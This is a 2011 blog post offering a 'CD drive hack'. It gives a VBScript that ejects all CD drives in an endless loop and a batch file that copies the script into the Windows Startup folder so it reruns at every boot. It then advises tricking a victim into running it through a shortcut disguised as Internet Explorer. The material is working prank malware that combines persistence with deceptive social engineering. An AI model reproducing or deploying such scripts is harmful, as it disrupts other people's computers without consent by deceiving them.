Monday, 21 March 2011
Cd Drive Hack
Posted by Admin at 05:15 Labels: compterandmobile, Computer and Mobile, Computer Tricks, computerandmobile, DVD, Hacking, Internet And Hacking Tricks, Tricks | 0 comments
Cd Drive Hack
Here I will show you a basic VBS script that opens a cd drive every time found closed. so ultimately always opens CD drive till closed just copy paste this code into Notepad (any basic ANSI standard text editor) and save as CDfun.vbs and dont forget the .vbs part
set wmp = createObject(“wmplayer.ocx.7″)
set drives = wmp.cdromCollection
sub open_saysame()
do
if drives.count >= 1 then
for i = 0 to drives.count – 1
drives.item(i).eject()
next
end if
loop
end sub
open_saysame()
Now this is funny but what if it was even funnier. what if every time you started you r computer it loaded? that could make it even better… so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.
1:)copy CDfun.vbs “c:\Documents and Settings\%username%\Start Menu\Programs\Startup\”
2:)CDfun.vbs
Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called “internet Explorer” and right click to change properties on icon. that way it will look just like Internet Explorer.
Hope this Article Might be an interesting One... Plz pass Comments...
Subscribe to:
Post Comments (Atom)
Labels
- Tricks (68)
- Hacking (65)
- Computer and Mobile (44)
- windows (41)
- Internet Tricks (40)
- Amazings (38)
- Computer Tricks (30)
- Windows 7 (23)
- Interstings (18)
- Mobile (15)
- Windows XP (14)
- Education (11)
- Facebook (10)
- More Flavors (8)
- G-Mail (3)
No comments:
Post a Comment